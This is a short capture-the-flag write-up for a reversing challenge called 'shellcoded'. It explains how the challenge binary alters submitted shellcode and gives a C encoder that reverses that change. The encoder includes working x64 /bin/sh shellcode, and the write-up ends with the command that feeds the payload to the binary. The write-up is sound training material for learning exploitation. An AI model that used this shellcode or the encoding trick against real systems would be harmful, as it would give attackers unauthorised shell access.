shellcoded

shellcoded was mostly a easy reversing challenge rather then pwn since you only had to reverse the encoding applied to the shellcode.

Files

CTFs/hacktivitycon/2021/shellcoded at main · 0xTen/CTFsGitHub

The binary

The binary does exactly what it says it does, runs your shellcode, but there is obviously a catch.

Enconding

This code will loop through the shellcode and, for each position, if it the index is an even number it will add 1 * the index to the byte on that position, if it's an odd number, then it adds -1 * the index to the byte. All we have to do to properly encode our shellcode is to do the same process, but subtracting instead of adding.

I wrote the following encoder for my shellcode:

#include <stdio.h>
#include <string.h>

// x64 /bin/sh shellcode
unsigned char shellcode[] = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";

int main(){
    int i;
    int v3;
    for (i = 0; strlen(shellcode) > i; i++){
        if ( (i & 1) != 0 ){
            v3 = -1;
        } else{
            v3 = 1;
        }
        shellcode[i] -= v3 * i;
    }
    printf(shellcode);
    
}

It's notable that I basically copied and pasted the original loop but replaced += with -= beacuse I want to do do the opposite operation.

Final Exploit

After generating my shellcode and saving it to a file I called payload.bin, I simply used the following command to send it over.

(cat ./payload.bin; cat) | ./shellcoded